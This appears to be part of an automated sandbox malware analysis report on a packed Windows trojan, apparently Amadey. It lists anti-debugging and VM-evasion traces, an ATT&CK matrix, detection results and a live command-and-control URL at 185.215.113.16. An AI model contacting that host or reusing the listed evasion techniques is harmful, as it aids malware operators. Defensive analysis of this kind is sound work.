                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50C87 second address: 4E50C9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e mov dx, 6E6Ah 0x00000012 popad 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50C9A second address: 4E50D33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F865CD192DEh 0x00000009 adc al, 00000028h 0x0000000c jmp 00007F865CD192DBh 0x00000011 popfd 0x00000012 movzx ecx, di 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov dword ptr [esp], ebp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F865CD192E1h 0x00000022 adc esi, 0A301346h 0x00000028 jmp 00007F865CD192E1h 0x0000002d popfd 0x0000002e pushfd 0x0000002f jmp 00007F865CD192E0h 0x00000034 xor cx, 8FE8h 0x00000039 jmp 00007F865CD192DBh 0x0000003e popfd 0x0000003f popad 0x00000040 mov ebp, esp 0x00000042 jmp 00007F865CD192E6h 0x00000047 push dword ptr [ebp+0Ch] 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f popad 0x00000050 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50D33 second address: 4E50D50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C5559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50D50 second address: 4E50DB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d movzx eax, dx 0x00000010 mov dx, 051Ch 0x00000014 popad 0x00000015 call 00007F865CD192D9h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d movzx ecx, bx 0x00000020 pushfd 0x00000021 jmp 00007F865CD192E9h 0x00000026 sub esi, 7966F226h 0x0000002c jmp 00007F865CD192E1h 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50DB3 second address: 4E50DB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50DB9 second address: 4E50DEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F865CD192E6h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F865CD192DEh 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50DEC second address: 4E50E2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C554Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c pushad 0x0000000d push edx 0x0000000e pop esi 0x0000000f pushfd 0x00000010 jmp 00007F865D1C5551h 0x00000015 add eax, 2AAA1E46h 0x0000001b jmp 00007F865D1C5551h 0x00000020 popfd 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50E2E second address: 4E50E41 instructions: 0x00000000 rdtsc 0x00000002 mov bx, 29D0h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50E41 second address: 4E50E45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50E45 second address: 4E50E4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E005A8 second address: 4E005B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865D1C554Ch 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E005B8 second address: 4E005E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F865CD192E7h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov esi, edi 0x00000015 mov si, bx 0x00000018 popad 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E005E3 second address: 4E005F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865D1C554Fh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E005F6 second address: 4E0062D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push FFFFFFFEh 0x0000000a jmp 00007F865CD192E5h 0x0000000f call 00007F865CD192D9h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F865CD192DDh 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E0062D second address: 4E00760 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C5551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F865D1C5557h 0x00000011 sub si, 4A5Eh 0x00000016 jmp 00007F865D1C5559h 0x0000001b popfd 0x0000001c jmp 00007F865D1C5550h 0x00000021 popad 0x00000022 mov eax, dword ptr [esp+04h] 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F865D1C5551h 0x0000002d or cx, 5346h 0x00000032 jmp 00007F865D1C5551h 0x00000037 popfd 0x00000038 pushfd 0x00000039 jmp 00007F865D1C5550h 0x0000003e or ch, FFFFFFE8h 0x00000041 jmp 00007F865D1C554Bh 0x00000046 popfd 0x00000047 popad 0x00000048 mov eax, dword ptr [eax] 0x0000004a jmp 00007F865D1C5559h 0x0000004f mov dword ptr [esp+04h], eax 0x00000053 pushad 0x00000054 call 00007F865D1C5557h 0x00000059 pushad 0x0000005a popad 0x0000005b pop esi 0x0000005c pushfd 0x0000005d jmp 00007F865D1C554Fh 0x00000062 or esi, 1209453Eh 0x00000068 jmp 00007F865D1C5559h 0x0000006d popfd 0x0000006e popad 0x0000006f pop eax 0x00000070 jmp 00007F865D1C554Eh 0x00000075 push 670FAF65h 0x0000007a push eax 0x0000007b push edx 0x0000007c push eax 0x0000007d push edx 0x0000007e pushad 0x0000007f popad 0x00000080 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E00760 second address: 4E00764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E00764 second address: 4E0076A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E0076A second address: 4E007D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F865CD192DBh 0x00000009 add si, 5FFEh 0x0000000e jmp 00007F865CD192E9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F865CD192E0h 0x0000001a add ah, FFFFFFF8h 0x0000001d jmp 00007F865CD192DBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 add dword ptr [esp], 1066FE9Bh 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F865CD192E0h 0x00000036 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E007D6 second address: 4E007E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C554Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 42EAED instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 42C0E2 instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 5EEEC0 instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 66D4EA instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Special instruction interceptor: First address: 7FEAED instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Special instruction interceptor: First address: 7FC0E2 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Special instruction interceptor: First address: 9BEEC0 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Special instruction interceptor: First address: A3D4EA instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                  Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04E502E5 rdtsc
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Thread delayed: delay time: 180000
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Window / User API: threadDelayed 407
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Window / User API: threadDelayed 6714
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6932 | Thread sleep count: 37 > 30
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6932 | Thread sleep time: -74037s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2860 | Thread sleep count: 278 > 30
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2860 | Thread sleep time: -556278s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5484 | Thread sleep count: 407 > 30
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5484 | Thread sleep time: -12210000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6312 | Thread sleep time: -180000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6936 | Thread sleep count: 46 > 30
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6936 | Thread sleep time: -92046s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2908 | Thread sleep count: 6714 > 30
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2908 | Thread sleep time: -13434714s >= -30000s
                  Source: C:\Users\user\Desktop\file.exe | File Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Thread delayed: delay time: 30000
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Thread delayed: delay time: 180000
                  Source: axplong.exe, axplong.exe, 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                  Source: axplong.exe, 00000004.00000002.2605243731.0000000000E39000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000004.00000002.2605243731.0000000000E0A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                  Source: file.exe, 00000000.00000002.1399245952.00000000005BC000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.1425381279.000000000098C000.00000040.00000001.01000000.00000008.sdmp, axplong.exe, 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                  Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                  Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                  Anti Debugging

                  Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Thread information set: HideFromDebugger
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Thread information set: HideFromDebugger
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Open window title or class name: regmonclass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Open window title or class name: gbdyllo
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Open window title or class name: procmon_window_class
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Open window title or class name: ollydbg
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Open window title or class name: filemonclass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | File opened: NTICE
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | File opened: SICE
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | File opened: SIWVID
                  Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                  Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                  Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Process queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Process queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Process queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Process queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Process queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Process queried: DebugPort
                  Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04E502E5 rdtsc
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 4_2_007C645B mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 4_2_007CA1C2 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe"
                  Source: axplong.exe, axplong.exe, 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: HFQProgram Manager
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 4_2_007AD312 cpuid
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 4_2_007ACB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 4_2_007965B0 LookupAccountNameA

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 2.2.axplong.exe.790000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.file.exe.3c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 4.2.axplong.exe.790000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000004.00000003.1862874279.00000000049A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000003.1358005555.0000000004C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000002.00000002.1424184795.0000000000791000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1398782734.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000002.00000003.1383917764.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 Scheduled Task/Job | 12 Process Injection | 1 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                  Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 251 Virtualization/Sandbox Evasion | LSASS Memory | 741 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                  Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 12 Process Injection | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 251 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 Account Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                  DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 System Owner/User Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                  Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 File and Directory Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                  Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 224 System Information Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                  Source | Detection | Scanner | Label | Link
                  file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                  file.exe | 100% | Joe Sandbox ML | |
                  Source | Detection | Scanner | Label | Link
                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | 100% | Joe Sandbox ML | |
                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | 58% | ReversingLabs | Win32.Packed.Themida |
                  No Antivirus matches
                  No Antivirus matches
                  Source | Detection | Scanner | Label | Link
                  http://185.215.113.16/Jo89Ku7d/index.phpded | 100% | Avira URL Cloud | phishing |
                  http://185.215.113.16/Jo89Ku7d/index.php: | 100% | Avira URL Cloud | phishing |
                  http://185.215.113.16/Jo89Ku7d/index.phpX | 100% | Avira URL Cloud | phishing |
                  http://185.215.113.16/Jo89Ku7d/index.phpD | 100% | Avira URL Cloud | phishing |
                  http://185.215.113.16/Jo89Ku7d/index.php8 | 100% | Avira URL Cloud | phishing |
                  http://185.215.113.16/Jo89Ku7d/index.php32 | 100% | Avira URL Cloud | phishing |
                  http://185.215.113.16/Jo89Ku7d/index.phpi | 100% | Avira URL Cloud | phishing |
                  http://185.215.113.16/Jo89Ku7d/index.php | 100% | Avira URL Cloud | malware |
                  http://185.215.113.16/Jo89Ku7d/index.php3 | 100% | Avira URL Cloud | phishing |
                  http://185.215.113.16/Jo89Ku7d/index.phph | 100% | Avira URL Cloud | phishing |
                  http://185.215.113.16/Jo89Ku7d/index.phpp | 100% | Avira URL Cloud | phishing |
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  time.windows.com | unknown | unknown | false | | unknown

                    Name | Malicious | Antivirus Detection | Reputation
                    http://185.215.113.16/Jo89Ku7d/index.php | true | Avira URL Cloud: malware | unknown

                    Name | Source | Malicious | Antivirus Detection | Reputation
                    http://185.215.113.16/Jo89Ku7d/index.php32 | axplong.exe, 00000004.00000002.2605243731.0000000000DCB000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
                    http://185.215.113.16/Jo89Ku7d/index.php: | axplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpded | axplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpi | axplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
                    http://185.215.113.16/Jo89Ku7d/index.php8 | axplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpX | axplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
                    http://185.215.113.16/Jo89Ku7d/index.phph | axplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpD | axplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
                    http://185.215.113.16/Jo89Ku7d/index.php3 | axplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpp | axplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
                    IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                    185.215.113.16 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1519852
                    Start date and time:2024-09-27 01:27:05 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 5m 44s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:9
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@4/3@2/1
                    EGA Information:
                    • Successful, ratio: 33.3%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded IPs from analysis (whitelisted): 40.119.6.228, 20.101.57.9
                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, twc.trafficmanager.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target axplong.exe, PID 712 because there are no executed function
                    • Execution Graph export aborted for target file.exe, PID 6752 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: file.exe
                    Time | Type | Description
                    01:28:10 | Task Scheduler | Run new task: axplong path: C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
                    19:29:00 | API Interceptor | 652990x Sleep call for process: axplong.exe modified
                    Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                    185.215.113.16 | file.exe | Get hash | malicious | Amadey | Browse | 185.215.113.16/Jo89Ku7d/index.php
                    185.215.113.16 | file.exe | Get hash | malicious | Amadey | Browse | 185.215.113.16/Jo89Ku7d/index.php
                    185.215.113.16 | file.exe | Get hash | malicious | Amadey, DarkTortilla | Browse | 185.215.113.16/Jo89Ku7d/index.php
                    185.215.113.16 | file.exe | Get hash | malicious | Amadey | Browse | 185.215.113.16/Jo89Ku7d/index.php
                    185.215.113.16 | file.exe | Get hash | malicious | Amadey | Browse | 185.215.113.16/Jo89Ku7d/index.php
                    185.215.113.16 | file.exe | Get hash | malicious | Amadey | Browse | 185.215.113.16/Jo89Ku7d/index.php
                    185.215.113.16 | file.exe | Get hash | malicious | Amadey | Browse | 185.215.113.16/Jo89Ku7d/index.php
                    185.215.113.16 | file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse | 185.215.113.16/Jo89Ku7d/index.php
                    185.215.113.16 | file.exe | Get hash | malicious | Amadey | Browse | 185.215.113.16/Jo89Ku7d/index.php
                    185.215.113.16 | file.exe | Get hash | malicious | Amadey, Go Injector, XWorm | Browse | 185.215.113.16/Jo89Ku7d/index.php
                    No context
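                    Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                    WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Amadey | Browse | 185.215.113.16
                    WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                    WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                    WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Amadey | Browse | 185.215.113.16
                    WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
                    WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Amadey, DarkTortilla | Browse | 185.215.113.16
                    WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
                    WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Amadey | Browse | 185.215.113.16
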